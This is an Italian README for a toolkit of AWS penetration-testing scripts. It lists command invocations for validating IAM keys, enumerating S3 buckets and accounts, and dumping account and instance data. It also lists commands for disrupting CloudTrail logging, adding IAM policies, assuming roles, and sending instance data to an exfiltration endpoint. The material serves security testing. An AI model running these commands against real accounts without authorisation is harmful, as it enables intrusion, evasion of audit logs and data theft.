
Una raccolta di materiale per penetration testing su AWS
Questa è una raccolta di script scritti malamente per svolgere vari compiti relativi ai penetration test su AWS. Non ti preoccupare se non funziona per te. Potrebbe essere che AWS sia cambiato da quando uno strumento è stato scritto o che il codice faccia schifo. In ogni caso, sentiti libero di contribuire.
La maggior parte di questa robaccia è stata scritta da Daniel Grzelak ma ci sono stati molti contributi, in particolare da Mike Fuller.
pip install -r requirements.txt
Assicurati anche di configurare le tue credenziali AWS in ~/.aws/credentials.
Cose da fare per la raccolta di informazioni pre-compromissione.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json
Cose che ti aiuteranno a ottenere un punto d'appoggio in un account.
Cose che potrebbero aiutarti a rimanere nascosto dopo aver compromesso un account.
./disrupt_cloudtrail.py -s
Cose per aiutarti a capire cosa hai compromesso.
./dump_account_data.sh /tmp/
Cose per aiutarti a spostarti all'interno di un account e raccogliere diversi livelli di accesso.
./dump_instance_attributes.py -u -o /tmp/
./dump_cloudformation_stack_descriptions.py -o /tmp/data
./assume_roles.py -o /tmp/out.json
./add_iam_policy.py -u myuser -r myrole -g mygroup
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint
Cose per aiutare a mantenere l'accesso a un account.
Cose per aiutarti a estrarre e spostare dati in modi AWS.
Altre cose che ero troppo stupido o pigro per classificare.